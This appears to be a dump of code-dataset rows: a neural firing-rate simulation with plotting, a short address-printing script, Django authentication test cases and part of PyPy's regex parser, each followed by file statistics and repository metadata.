ax.spines[axis].set_linewidth(line_width)
plt.tick_params(width=line_width, length=tick_len)
plt.yscale('symlog', linthresh=0.1)  # 'linthreshy' was removed in Matplotlib 3.5
plt.plot(l_r_e, color='blue', linewidth=plot_line_width)
plt.plot(l_r_i, color='red', linewidth=plot_line_width)
plt.xticks(np.arange(30000, 90000 + 5000, 20000), np.arange(0, 6 + 0.5, 2), fontsize=font_size_1, **hfont)
plt.yticks([0, 1, 100, 10000], fontsize=font_size_1, **hfont)
plt.xlabel('Time (s)', fontsize=font_size_1, **hfont)
plt.ylabel('Firing rate (Hz)', fontsize=font_size_1, **hfont)
plt.xlim([30000, 90000])
plt.ylim([0, 10000])
plt.legend(['Exc', 'Inh'], prop={"family": "Arial", 'size': font_size_1}, loc='upper right')
plt.savefig('paper_figures/png/Revision_Fig_Point_SSN.png')
plt.savefig('paper_figures/pdf/Revision_Fig_Point_SSN.pdf')
# simulation setup
dt = 0.0001
T = int(9/dt)
# neuronal parameters
tau_e, tau_i = 0.020, 0.010
alpha_e, alpha_i = 2, 2
# short-term depression
x, u_d = 1, 1
tau_x = 0.20
# network connectivity
Jee = 1.8
Jie = 1.0
Jei = 1.0
Jii = 0.6
r_e, r_i = 0, 0
z_e, z_i = 0, 0
l_r_e, l_r_i, l_x = [], [], []
for i in range(T):
if 50000 <= i < 70000:
g_e, g_i = 2.0, 2
else:
g_e, g_i = 1.55, 2
g_e = g_e * (g_e > 0)
g_i = g_i * (g_i > 0)
# SSN part
z_e = Jee * x * r_e - Jei * r_i + g_e
z_i = Jie * r_e - Jii * r_i + g_i
z_e = z_e * (z_e > 0)
z_i = z_i * (z_i > 0)
r_e = r_e + (-r_e + np.power(z_e, alpha_e)) / tau_e * dt
r_i = r_i + (-r_i + np.power(z_i, alpha_i)) / tau_i * dt
r_e = r_e * (r_e > 0)
r_i = r_i * (r_i > 0)
x = x + ((1 - x) / tau_x - u_d * x * r_e) * dt
x = np.clip(x, 0, 1)
l_r_e.append(r_e)
l_r_i.append(r_i)
l_x.append(x)
l_r_e = np.asarray(l_r_e)
l_r_i = np.asarray(l_r_i)
l_x = np.asarray(l_x)
# plotting
plt.figure(figsize=(figure_len, figure_width))
ax = plt.gca()
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.spines['bottom'].set_visible(True)
ax.spines['left'].set_visible(True)
for axis in ['top', 'bottom', 'left', 'right']:
ax.spines[axis].set_linewidth(line_width)
plt.tick_params(width=line_width, length=tick_len)
plt.yscale('symlog', linthresh=0.1)
plt.plot(l_r_e, color='blue', linewidth=plot_line_width)
plt.plot(l_r_i, color='red', linewidth=plot_line_width)
plt.xticks(np.arange(30000, 90000 + 5000, 20000), np.arange(0, 6 + 0.5, 2), fontsize=font_size_1, **hfont)
plt.yticks([0, 1, 100, 10000], fontsize=font_size_1, **hfont)
plt.xlabel('Time (s)', fontsize=font_size_1, **hfont)
plt.ylabel('Firing rate (Hz)', fontsize=font_size_1, **hfont)
plt.xlim([30000, 90000])
plt.ylim([0, 10000])
plt.legend(['Exc', 'Inh'], prop={"family": "Arial", 'size': font_size_1}, loc='upper right')
plt.savefig('paper_figures/png/Revision_Fig_Point_NTA.png')
plt.savefig('paper_figures/pdf/Revision_Fig_Point_NTA.pdf')
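Editorial sketch (not part of the original record): the SSN and NTA simulation blocks above, and the linear-network block whose plotting code opens this excerpt, share one Euler loop and differ only in the weight matrix and in whether short-term depression is enabled. The consolidated function below is an editorial assumption (its name and signature are not in the source); it reproduces the update rules shown above: rectified inputs, supralinear transfer z**alpha, Euler steps of size dt, and an optional depression variable x clipped to [0, 1].

import numpy as np

def simulate_ei(J, g_e_base, g_e_stim, g_i=2.0, stim=(50000, 70000), T=90000,
                dt=1e-4, tau_e=0.020, tau_i=0.010, alpha=2.0,
                tau_x=None, u_d=1.0):
    """Euler-integrate the E-I rate model; returns excitatory/inhibitory traces."""
    Jee, Jei, Jie, Jii = J
    r_e = r_i = 0.0
    x = 1.0  # synaptic resource; stays at 1 when depression is disabled
    l_r_e, l_r_i = np.empty(T), np.empty(T)
    for i in range(T):
        g_e = g_e_stim if stim[0] <= i < stim[1] else g_e_base
        z_e = max(Jee * x * r_e - Jei * r_i + g_e, 0.0)  # rectified E input
        z_i = max(Jie * r_e - Jii * r_i + g_i, 0.0)      # rectified I input
        r_e = max(r_e + (-r_e + z_e ** alpha) / tau_e * dt, 0.0)
        r_i = max(r_i + (-r_i + z_i ** alpha) / tau_i * dt, 0.0)
        if tau_x is not None:  # short-term depression (NTA variant only)
            x = min(max(x + ((1.0 - x) / tau_x - u_d * x * r_e) * dt, 0.0), 1.0)
        l_r_e[i], l_r_i[i] = r_e, r_i
    return l_r_e, l_r_i

# The SSN run above corresponds to simulate_ei((1.8, 1.0, 2.0, 1.0), 1.55, 2.0),
# the NTA run to simulate_ei((1.8, 1.0, 1.0, 0.6), 1.55, 2.0, tau_x=0.20).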
| 25.72619 | 106 | 0.641832 | 1,305 | 6,483 | 2.922605 | 0.111877 | 0.024646 | 0.037756 | 0.012585 | 0.907708 | 0.898532 | 0.891453 | 0.891453 | 0.891453 | 0.856843 | 0 | 0.067937 | 0.182632 | 6,483 | 252 | 107 | 25.72619 | 0.651821 | 0.045349 | 0 | 0.860335 | 0 | 0 | 0.099498 | 0.046346 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.03352 | 0 | 0.03352 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
0eba4221dffaf7a551a55fe9039a2ff394a5f1fa | 110 | py | Python | ROHIT KUMAR/address.py | asumit499/Python-BootCamp | 0b99f9cb862189d13ad291eac12a8be6c46357f5 | ["MIT"] | 4 | 2022-03-20T10:59:53.000Z | 2022-03-25T18:28:04.000Z | ROHIT KUMAR/address.py | asumit499/Python-BootCamp | 0b99f9cb862189d13ad291eac12a8be6c46357f5 | ["MIT"] | null | null | null | ROHIT KUMAR/address.py | asumit499/Python-BootCamp | 0b99f9cb862189d13ad291eac12a8be6c46357f5 | ["MIT"] | 15 | 2022-03-12T11:49:10.000Z | 2022-03-15T06:22:55.000Z |
print("address\nvillage=rajwada\npost office =rajwada\npolice station=sonbarsa\ndist.=sitamarhi\npin=843330")
| 55 | 109 | 0.827273 | 14 | 110 | 6.5 | 0.928571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.056604 | 0.036364 | 110 | 1 | 110 | 110 | 0.801887 | 0 | 0 | 0 | 0 | 1 | 0.909091 | 0.681818 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 8 |
0ef3c7f60ac42a3fafe796541cf8caf0b0dfa70b | 18,117 | py | Python | typingtester/accounts/tests.py | AmirMohammad2003/TypingWebsite | 4f45e88dfdd35666c0028fc53d22197014505226 | ["MIT"] | 2 | 2022-01-23T10:04:19.000Z | 2022-01-23T10:21:45.000Z | typingtester/accounts/tests.py | AmirMohammad2003/TypingWebsite | 4f45e88dfdd35666c0028fc53d22197014505226 | ["MIT"] | null | null | null | typingtester/accounts/tests.py | AmirMohammad2003/TypingWebsite | 4f45e88dfdd35666c0028fc53d22197014505226 | ["MIT"] | null | null | null |
"""accounts.tests
Test Cases Defined for Accounts Application
"""
import json
from django.core import mail
from django.test import TestCase
from django.contrib.auth import get_user_model
from django.utils.http import urlsafe_base64_encode
class LoginAndLogoutTestCases(TestCase):
"""Login and Logout Test Cases"""
def setUp(self):
self.user_model = get_user_model()
self.user = self.user_model.objects.create_user(
username='test', password='test', email='test@test.com'
)
def test_login(self):
"""
Test Login if the user is active and his/her email is verified
and the credentials are valid
"""
self.user.is_active = True
self.user.is_email_verified = True
self.user.save()
response = self.client.post(
'/auth/login/',
{'username': 'test', 'password': 'test'}
)
self.assertEqual(response.status_code, 200)
_res = json.loads(response.content)
self.assertEqual(_res['success'], 'true')
self.assertEqual(_res['username'], 'test')
def test_login_wrong_password(self):
"""Test Login with wrong password"""
self.user.is_active = True
self.user.is_email_verified = True
self.user.save()
response = self.client.post('/auth/login/',
{'username': 'test', 'password': 'test1'})
self.assertEqual(response.status_code, 200)
_res = json.loads(response.content)
self.assertEqual(_res['success'], 'false')
def test_login_inactive_user(self):
"""test login if the user is inactive"""
self.user.is_active = False
self.user.is_email_verified = True
self.user.save()
response = self.client.post('/auth/login/',
{'username': 'test', 'password': 'test'})
self.assertEqual(response.status_code, 200)
_res = json.loads(response.content)
self.assertEqual(_res['success'], 'false')
def test_login_not_verified_email(self):
"""test login if the user's email is not verified"""
self.user.is_active = True
self.user.is_email_verified = False
self.user.save()
response = self.client.post('/auth/login/',
{'username': 'test', 'password': 'test'})
self.assertEqual(response.status_code, 200)
_res = json.loads(response.content)
self.assertEqual(_res['success'], 'false')
def test_logout(self):
"""Test Logout if the user is logged in"""
self.client.login(username='test', password='test')
response = self.client.post('/auth/logout/')
self.assertEqual(response.status_code, 200)
_res = json.loads(response.content)
self.assertEqual(_res['success'], 'true')
def test_logout_not_logged_in(self):
"""Test Logout if the user is not logged in"""
self.client.logout()
response = self.client.post('/auth/logout/')
self.assertEqual(response.status_code, 200)
_res = json.loads(response.content)
self.assertEqual(_res['success'], 'false')
class CheckIfAuthenticatedTestCases(TestCase):
"""
Test the CheckIfAuthenticated view
"""
def setUp(self):
self.user_model = get_user_model()
self.user = self.user_model.objects.create_user(
username='test', password='test', email='test@test.com')
self.user.is_active = True
self.user.is_email_verified = True
self.user.save()
def test_check_if_authenticated_true(self):
"""Test if the user is authenticated"""
self.client.login(username='test', password='test')
response = self.client.post('/auth/check/')
self.assertEqual(response.status_code, 200)
_res = json.loads(response.content)
self.assertEqual(_res['Authenticated'], 'true')
def test_check_if_authenticated_false(self):
"""Test if the user is not authenticated"""
response = self.client.post('/auth/check/')
self.assertEqual(response.status_code, 200)
_res = json.loads(response.content)
self.assertEqual(_res['Authenticated'], 'false')
class RegisterTestCases(TestCase):
"""Test cases for registering a new user"""
def setUp(self):
self.user_model = get_user_model()
def test_register_success(self):
"""Test a successful registration"""
response = self.client.post(
'/auth/register/',
{
'username': 'test', 'password1': 'testtesttest',
'password2': 'testtesttest', 'email': 'test@test.com'
}
)
self.assertEqual(response.status_code, 200)
_res = json.loads(response.content)
self.assertEqual(_res['success'], 'unknown')
self.assertEqual(len(mail.outbox), 1)
url = mail.outbox[0].message().as_string().split('\n')[-1]
response = self.client.get(url)
self.assertEqual(response.status_code, 302)
self.client.post(
'/auth/login/', {'username': 'test', 'password': 'testtesttest'}
)
response = self.client.post('/auth/check/')
self.assertEqual(response.status_code, 200)
_res = json.loads(response.content)
self.assertEqual(_res['Authenticated'], 'true')
def test_register_username_exists(self):
"""Test if the username already exists"""
self.user_model.objects.create_user(
username='test4', password='test', email='test4@test.com'
)
response = self.client.post(
'/auth/register/',
{
'username': 'test4', 'password1': 'test',
'password2': 'test', 'email': 'test4@test.com'
}
)
self.assertEqual(response.status_code, 200)
_res = json.loads(response.content)
self.assertEqual(_res['success'], 'false')
def test_register_email_exists(self):
"""Test if the email already exists"""
self.user_model.objects.create_user(
username='test', password='test', email='test@test.com'
)
response = self.client.post(
'/auth/register/',
{
'username': 'test3', 'password1': 'test',
'password2': 'test', 'email': 'test3@test.com'
}
)
self.assertEqual(response.status_code, 200)
_res = json.loads(response.content)
self.assertEqual(_res['success'], 'false')
def test_register_invalid_password(self):
"""Test if the password is invalid"""
response = self.client.post(
'/auth/register/',
{
'username': 'test5', 'password1': 'test',
'password2': 'test', 'email': 'test5@test.com'
}
)
self.assertEqual(response.status_code, 200)
_res = json.loads(response.content)
self.assertEqual(_res['success'], 'false')
def test_register_unverified_email_login(self):
"""Test if the user's email is not verified"""
response = self.client.post(
'/auth/register/',
{
'username': 'test2', 'password1': '0s5I6vjDCKeo',
'password2': '0s5I6vjDCKeo', 'email': 'test2@test.com'
}
)
self.assertEqual(response.status_code, 200)
_res = json.loads(response.content)
self.assertEqual(_res['success'], 'unknown')
self.assertEqual(len(mail.outbox), 1)
self.client.post(
'/auth/login/', {'username': 'test2', 'password': '0s5I6vjDCKeo'}
)
response = self.client.post('/auth/check/')
self.assertEqual(response.status_code, 200)
_res = json.loads(response.content)
self.assertEqual(_res['Authenticated'], 'false')
class VerifyEmailTestCases(TestCase):
"""Test cases for verifying a user's email"""
def setUp(self):
self.user_model = get_user_model()
def test_verify_email_failure(self):
"""Test if the verification link is invalid"""
response = self.client.get(
'/auth/verify/asdf/adsfasdfasdfasdfasdfasdf/')
self.assertEqual(response.status_code, 200)
_res = json.loads(response.content)
self.assertEqual(_res['success'], 'false')
class ForgotPasswordTestCases(TestCase):
"""Test cases for resetting a user's password"""
def setUp(self):
self.user_model = get_user_model()
self.user = self.user_model.objects.create_user(
username='test', password='test', email='test@test.com'
)
def test_forgot_password_success(self):
"""Test a successful password reset"""
response = self.client.post(
"/auth/reset/",
{'email': 'test@test.com'}
)
self.assertEqual(response.status_code, 200)
_res = json.loads(response.content)
self.assertEqual(_res['success'], 'true')
self.assertEqual(len(mail.outbox), 1)
url = mail.outbox[0].message().as_string().split('\n')[-1]
response = self.client.get(url)
self.assertEqual(response.status_code, 302)
uidb64 = url.split('/')[-3]
token = url.split('/')[-2]
response = self.client.post(
'/auth/reset/confirm/',
{
'password1': 'testtesttest',
'password2': 'testtesttest',
'uidb64': uidb64,
'token': token
}
)
self.assertEqual(response.status_code, 200)
_res = json.loads(response.content)
self.assertEqual(_res['success'], 'true')
self.client.post(
'/auth/login/', {'username': 'test', 'password': 'testtesttest'}
)
response = self.client.post('/auth/check/')
self.assertEqual(response.status_code, 200)
_res = json.loads(response.content)
self.assertEqual(_res['Authenticated'], 'true')
def test_forgot_password_failure(self):
"""Test a if the email address is invalid"""
response = self.client.post(
"/auth/reset/",
{'email': 'dummy@test.com'}
)
self.assertEqual(response.status_code, 200)
_res = json.loads(response.content)
self.assertEqual(_res['success'], 'true')
self.assertEqual(len(mail.outbox), 0)
def test_forgot_password_logged_in(self):
"""Test if the user is already logged in"""
self.user.is_email_verified = True
self.user.is_active = True
self.user.save()
self.client.post(
'/auth/login/', {'username': 'test',
'password': 'test'}
)
response = self.client.post(
"/auth/reset/",
{'email': 'test@test.com'}
)
self.assertEqual(response.status_code, 200)
_res = json.loads(response.content)
self.assertEqual(_res['success'], 'false')
self.assertEqual(len(mail.outbox), 0)
self.assertContains(response, 'logged in')
def test_forgot_password_confirm_bad_token(self):
"""Test if the token or uidb64 is invalid"""
response = self.client.post(
'/auth/reset/confirm/',
{
'password1': 'testtesttest',
'password2': 'testtesttest',
'uidb64': 'asldkfj', # invalid data
'token': 'asldfjalskdfjalsjkdfl;a' # invalid data
}
)
self.assertEqual(response.status_code, 200)
_res = json.loads(response.content)
self.assertEqual(_res['success'], 'false')
self.assertEqual(len(mail.outbox), 0)
class FetchUserInformationTestCase(TestCase):
"""Test cases for fetching user information"""
def setUp(self):
self.user_model = get_user_model()
self.user = self.user_model.objects.create_user(
username='test', password='test', email='test@test.com'
)
self.user.is_active = True
self.user.is_email_verified = True
self.user.save()
def test_fetch_user_information_success(self):
"""Test if the user information is fetched successfully"""
self.client.login(username='test', password='test')
response = self.client.post('/auth/user/info/')
self.assertEqual(response.status_code, 200)
_res = json.loads(response.content)
self.assertEqual(_res['success'], 'true')
self.assertEqual(_res['username'], 'test')
self.assertEqual(_res['email'], 'test@test.com')
def test_fetch_user_information_notloggedin(self):
"""Test if the user information is fetched successfully"""
response = self.client.post('/auth/user/info/')
self.assertEqual(response.status_code, 401)
def test_fetch_user_information_notverified(self):
"""Test if the user information is fetched successfully"""
self.user.is_email_verified = False
self.user.save()
self.client.login(username='test', password='test')
response = self.client.post('/auth/user/info/')
self.assertEqual(response.status_code, 403)
class ChangePasswordTestCases(TestCase):
"""Test cases for changing a user's password"""
def setUp(self):
self.user_model = get_user_model()
self.user = self.user_model.objects.create_user(
username='test', password='test', email='test@test.com'
)
self.user.is_active = True
self.user.is_email_verified = True
self.user.save()
def test_change_password_success(self):
"""Test if the user's password is changed successfully"""
self.client.login(username='test', password='test')
response = self.client.post(
'/auth/password/change/',
{'old_password': 'test', 'new_password1': 'testtesttest',
'new_password2': 'testtesttest'}
)
self.assertEqual(response.status_code, 200)
_res = json.loads(response.content)
self.assertEqual(_res['success'], 'true')
def test_change_password_failure(self):
"""Test if the user's password is not changed successfully
because of invalid old password"""
self.client.login(username='test', password='test')
response = self.client.post(
'/auth/password/change/',
{'old_password': 'test2', 'new_password1': 'testtesttest',
'new_password2': 'testtesttest'}
)
self.assertEqual(response.status_code, 200)
_res = json.loads(response.content)
self.assertEqual(_res['success'], 'false')
def test_change_password_notloggedin(self):
"""Test if the user's password is not changed successfully
because of not being logged in"""
response = self.client.post(
'/auth/password/change/',
{'old_password': 'test', 'new_password1': 'testtesttest',
'new_password2': 'testtesttest'}
)
self.assertEqual(response.status_code, 401)
def test_change_password_old_password_equal_new_password(self):
"""Test if the user's password is not changed successfully
because of old password is equal to new password"""
self.client.login(username='test', password='test')
response = self.client.post(
'/auth/password/change/',
{'old_password': 'test', 'new_password1': 'test',
'new_password2': 'test'}
)
self.assertEqual(response.status_code, 200)
_res = json.loads(response.content)
self.assertEqual(_res['success'], 'false')
class ResendVerificationEmail(TestCase):
"""Test cases for resending verification email"""
def setUp(self):
self.user_model = get_user_model()
self.user = self.user_model.objects.create_user(
username='test', password='test', email='test@test.com')
def test_resend_verification_email_success(self):
"""Test if the verification email is sent successfully"""
session = self.client.session
session['_id'] = urlsafe_base64_encode(str(self.user.id).encode())
session.save()
response = self.client.post('/auth/resend/verification/')
self.assertEqual(response.status_code, 200)
_res = json.loads(response.content)
self.assertEqual(_res['success'], 'true')
self.assertEqual(len(mail.outbox), 1)
def test_resend_verification_email_no_session_id(self):
"""Test if the verification email is not sent successfully
because there is no session id"""
response = self.client.post('/auth/resend/verification/')
self.assertEqual(response.status_code, 200)
_res = json.loads(response.content)
self.assertEqual(_res['success'], 'false')
self.assertEqual(len(mail.outbox), 0)
def test_resend_verification_email_logged_in(self):
"""Test if the verification email is not sent successfully
because the user is logged in"""
self.client.login(username='test', password='test')
response = self.client.post('/auth/resend/verification/')
self.assertEqual(response.status_code, 200)
_res = json.loads(response.content)
self.assertEqual(_res['success'], 'false')
self.assertEqual(len(mail.outbox), 0)
def test_resend_verification_email_already_verified(self):
"""Test if the verification email is not sent successfully
because the user is already verified"""
self.user.is_email_verified = True
self.user.save()
session = self.client.session
session['_id'] = urlsafe_base64_encode(str(self.user.id).encode())
session.save()
response = self.client.post('/auth/resend/verification/')
self.assertEqual(response.status_code, 200)
_res = json.loads(response.content)
self.assertEqual(_res['success'], 'false')
self.assertEqual(len(mail.outbox), 0)
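Editorial sketch (not part of the original test file): nearly every test above repeats the same three lines, a POST, a json.loads of the response body, and an assertion on _res['success']. A small mixin could factor that out. The names JsonAssertMixin, post_json, and assertJsonSuccess are hypothetical; the URL is one exercised by the tests above.

import json
from django.test import TestCase

class JsonAssertMixin:
    """Hypothetical helper collapsing the repeated POST/decode/assert pattern."""

    def post_json(self, url, data=None):
        response = self.client.post(url, data or {})
        self.assertEqual(response.status_code, 200)
        return json.loads(response.content)

    def assertJsonSuccess(self, url, data=None, expected='true'):
        _res = self.post_json(url, data)
        self.assertEqual(_res['success'], expected)

class LogoutSmokeTest(JsonAssertMixin, TestCase):
    def test_logout_not_logged_in(self):
        self.client.logout()
        self.assertJsonSuccess('/auth/logout/', expected='false')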
| 38.302326 | 78 | 0.610421 | 2,008 | 18,117 | 5.360558 | 0.080179 | 0.108696 | 0.046823 | 0.060201 | 0.831289 | 0.787904 | 0.77081 | 0.744705 | 0.726496 | 0.698439 | 0 | 0.013459 | 0.257714 | 18,117 | 472 | 79 | 38.383475 | 0.786957 | 0.106199 | 0 | 0.68232 | 0 | 0 | 0.142875 | 0.01621 | 0 | 0 | 0 | 0 | 0.218232 | 1 | 0.10221 | false | 0.171271 | 0.013812 | 0 | 0.138122 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
0efa1cb084ddaf2c2a94721470d81904f8055037 | 76,176 | py | Python | pypy/rlib/parsing/regexparse.py | woodrow/pyoac | b5dc59e6a38e7912db47f26fb23ffa4764a3c0e7 | ["MIT"] | 1 | 2019-05-27T00:58:46.000Z | 2019-05-27T00:58:46.000Z | pypy/rlib/parsing/regexparse.py | woodrow/pyoac | b5dc59e6a38e7912db47f26fb23ffa4764a3c0e7 | ["MIT"] | null | null | null | pypy/rlib/parsing/regexparse.py | woodrow/pyoac | b5dc59e6a38e7912db47f26fb23ffa4764a3c0e7 | ["MIT"] | null | null | null |
import py
from pypy.rlib.parsing.parsing import PackratParser, Rule
from pypy.rlib.parsing.tree import Nonterminal
from pypy.rlib.parsing.regex import StringExpression, RangeExpression
from pypy.rlib.parsing.lexer import Lexer, DummyLexer
from pypy.rlib.parsing.deterministic import compress_char_set, DFA
import string
set = py.builtin.set
ESCAPES = {
"a": "\a",
"b": "\b",
"e": "\x1b",
"f": "\f",
"n": "\n",
"r": "\r",
"t": "\t",
"v": "\v",
}
for i in range(256):
# Add the ctrl-x types:
# Rule, according to PCRE:
# if x is a lower case letter, it is converted to upper case.
# Then bit 6 of the character (hex 40) is inverted.
# Thus, \cz => 0x1A, \c{ => 0x3B, \c; => 0x7B.
escaped = "c%s" % chr(i)
ESCAPES[escaped] = chr(ord(chr(i).upper()) ^ 0x40)
def unescape_muncher(string):
"""Return a tuple, representing the first character of the string
(appropriately unescaped) and the rest of the string that wasn't
handled."""
if string[0] != '\\':
# Not an escape character
return string[0], string[1:]
if string[1] == 'x':
# Hex char, must have two hex digits
char = chr(int(string[2:4], 16))
return char, string[4:]
if string[1] in '01234567':
# Octal number, up to three digits long
span = 2
span += (span < len(string)) and (string[span] in '01234567')
span += (span < len(string)) and (string[span] in '01234567')
char = chr(int(string[1:span], 8))
return char, string[span:]
if string[1] == 'c':
# Special \cx types
return ESCAPES['c'+string[2]], string[3:]
if string[1] in ESCAPES:
# Special escapes are in ESCAPES
return ESCAPES[string[1]], string[2:]
# Otherwise, it's just the character it's meant to be (e.g., '\.')
return string[1], string[2:]
def unescape(s):
"""Unescape a whole string."""
result = []
while s:
char, s = unescape_muncher(s)
result.append(char)
return "".join(result)
syntax = r"""
EOF:
!__any__;
parse:
regex
[EOF];
regex:
r1 = concatenation
'|'
r2 = regex
return {r1 | r2}
| concatenation;
concatenation:
l = repetition*
return {reduce(operator.add, l, regex.StringExpression(""))};
repetition:
r1 = primary
'*'
return {r1.kleene()}
| r1 = primary
'+'
return {r1 + r1.kleene()}
| r1 = primary
'?'
return {regex.StringExpression("") | r1}
| r1 = primary
'{'
n = clippednumrange
'}'
return {r1 * n + r1.kleene()}
| r1 = primary
'{'
n = numrange
'}'
return {r1 * n[0] + reduce(operator.or_, [r1 * i for i in range(n[1] - n[0] + 1)], regex.StringExpression(""))}
| '{'
return {regex.StringExpression("{")}
| primary;
primary:
['('] regex [')']
| range
| cc = charclass
return {reduce(operator.or_, [regex.RangeExpression(a, chr(ord(a) + b - 1)) for a, b in compress_char_set(cc)])}
| c = char
return {regex.StringExpression(c)}
| '.'
return {regex.RangeExpression(chr(0), chr(255))}
| '-'
return {regex.StringExpression('-')}
| '\'
return {regex.StringExpression('\\')}
| ']'
return {regex.StringExpression(']')};
char:
c = QUOTEDCHAR
return {unescape(c)}
| c = CHAR
return {c};
QUOTEDCHAR:
`(\\x[0-9a-fA-F]{2})|(\\[0-3]?[0-7][0-7])|(\\c.)|(\\[^dswDSW])`;
CHAR:
`[^\*\+\(\)\[\]\{\|\.\-\?\^\\]`;
range:
'['
s = rangeinner
']'
return {reduce(operator.or_, [regex.RangeExpression(a, chr(ord(a) + b - 1)) for a, b in compress_char_set(s)])};
rangeinner:
'^'
s = subrange
return {set([chr(c) for c in range(256)]) - s}
| subrange;
subrange:
']'
l = rangeelement*
return {reduce(operator.or_, [set(["]"])] + l)}
| l = rangeelement+
return {reduce(operator.or_, l)};
rangeelement:
charclass
| c1 = char
'-'
c2 = char
return {set([chr(i) for i in range(ord(c1), ord(c2) + 1)])}
| '.'
return { set(['.']) }
| '*'
return { set(['*']) }
| '+'
return { set(['+']) }
| '?'
return { set(['?']) }
| '-'
return { set(['-']) }
| '['
return { set(['[']) }
| c = char
return { set([c]) };
numrange:
n1 = NUM
','
n2 = NUM
return {n1, n2}
| n1 = NUM
return {n1, n1};
clippednumrange:
n1 = NUM
','
return {n1};
charclass:
'\' 'd'
return { set([chr(c) for c in range(ord('0'), ord('9')+1)]) }
| '\' 's'
return { set(['\t', '\n', '\f', '\r', ' ']) }
| '\' 'w'
return { set([chr(c) for c in range(ord('a'), ord('z')+1)] + [chr(c) for c in range(ord('A'), ord('Z')+1)] + [chr(c) for c in range(ord('0'), ord('9')+1)] + ['_']) }
| '\' 'D'
return { set([chr(c) for c in range(256)]) - set([chr(c) for c in range(ord('0'), ord('9')+1)]) }
| '\' 'S'
return { set([chr(c) for c in range(256)]) - set(['\t', '\n', '\f', '\r', ' ']) }
| '\' 'W'
return { set([chr(c) for c in range(256)]) - set([chr(c) for c in range(ord('a'), ord('z')+1)] + [chr(c) for c in range(ord('A'), ord('Z')+1)] + [chr(c) for c in range(ord('0'), ord('9')+1)] + ['_'])};
NUM:
c = `0|([1-9][0-9]*)`
return {int(c)};
"""
def parse_regex(s):
p = RegexParser(s)
r = p.parse()
return r
def make_runner(regex, view=False):
r = parse_regex(regex)
nfa = r.make_automaton()
dfa = nfa.make_deterministic()
if view:
dfa.view()
dfa.optimize()
if view:
dfa.view()
r = dfa.get_runner()
return r
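# Editorial usage sketch (comments added; not in the original file). This
# assumes the runner returned by get_runner() exposes recognize(), as the DFA
# runners in pypy.rlib.parsing.deterministic do:
#   r = make_runner("(a|b)c*")
#   r.recognize("acc")   # -> True
#   r.recognize("cb")    # -> False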
# generated code between this line and its other occurence
from pypy.rlib.parsing.pypackrat import PackratParser, Status
from pypy.rlib.parsing.pypackrat import BacktrackException
from pypy.rlib.parsing import regex
import operator
class Parser(object):
def EOF(self):
return self._EOF().result
def _EOF(self):
_key = self._pos
_status = self._dict_EOF.get(_key, None)
if _status is None:
_status = self._dict_EOF[_key] = Status()
else:
_statusstatus = _status.status
if _statusstatus == _status.NORMAL:
self._pos = _status.pos
return _status
elif _statusstatus == _status.ERROR:
raise BacktrackException(_status.error)
elif (_statusstatus == _status.INPROGRESS or
_statusstatus == _status.LEFTRECURSION):
_status.status = _status.LEFTRECURSION
if _status.result is not None:
self._pos = _status.pos
return _status
else:
raise BacktrackException(None)
elif _statusstatus == _status.SOMESOLUTIONS:
_status.status = _status.INPROGRESS
_startingpos = self._pos
try:
_result = None
_error = None
_choice0 = self._pos
_stored_result1 = _result
try:
_result = self.__any__()
except BacktrackException:
self._pos = _choice0
_result = _stored_result1
else:
raise BacktrackException(None)
if _status.status == _status.LEFTRECURSION:
if _status.result is not None:
if _status.pos >= self._pos:
_status.status = _status.NORMAL
self._pos = _status.pos
return _status
_status.pos = self._pos
_status.status = _status.SOMESOLUTIONS
_status.result = _result
_status.error = _error
self._pos = _startingpos
return self._EOF()
_status.status = _status.NORMAL
_status.pos = self._pos
_status.result = _result
_status.error = _error
return _status
except BacktrackException, _exc:
_status.pos = -1
_status.result = None
_error = _exc.error
_status.error = _error
_status.status = _status.ERROR
raise BacktrackException(_error)
def parse(self):
return self._parse().result
def _parse(self):
_key = self._pos
_status = self._dict_parse.get(_key, None)
if _status is None:
_status = self._dict_parse[_key] = Status()
else:
_statusstatus = _status.status
if _statusstatus == _status.NORMAL:
self._pos = _status.pos
return _status
elif _statusstatus == _status.ERROR:
raise BacktrackException(_status.error)
elif (_statusstatus == _status.INPROGRESS or
_statusstatus == _status.LEFTRECURSION):
_status.status = _status.LEFTRECURSION
if _status.result is not None:
self._pos = _status.pos
return _status
else:
raise BacktrackException(None)
elif _statusstatus == _status.SOMESOLUTIONS:
_status.status = _status.INPROGRESS
_startingpos = self._pos
try:
_result = None
_error = None
_call_status = self._regex()
_result = _call_status.result
_error = _call_status.error
_before_discard0 = _result
_call_status = self._EOF()
_result = _call_status.result
_error = self._combine_errors(_error, _call_status.error)
_result = _before_discard0
if _status.status == _status.LEFTRECURSION:
if _status.result is not None:
if _status.pos >= self._pos:
_status.status = _status.NORMAL
self._pos = _status.pos
return _status
_status.pos = self._pos
_status.status = _status.SOMESOLUTIONS
_status.result = _result
_status.error = _error
self._pos = _startingpos
return self._parse()
_status.status = _status.NORMAL
_status.pos = self._pos
_status.result = _result
_status.error = _error
return _status
except BacktrackException, _exc:
_status.pos = -1
_status.result = None
_error = self._combine_errors(_error, _exc.error)
_status.error = _error
_status.status = _status.ERROR
raise BacktrackException(_error)
def regex(self):
return self._regex().result
def _regex(self):
_key = self._pos
_status = self._dict_regex.get(_key, None)
if _status is None:
_status = self._dict_regex[_key] = Status()
else:
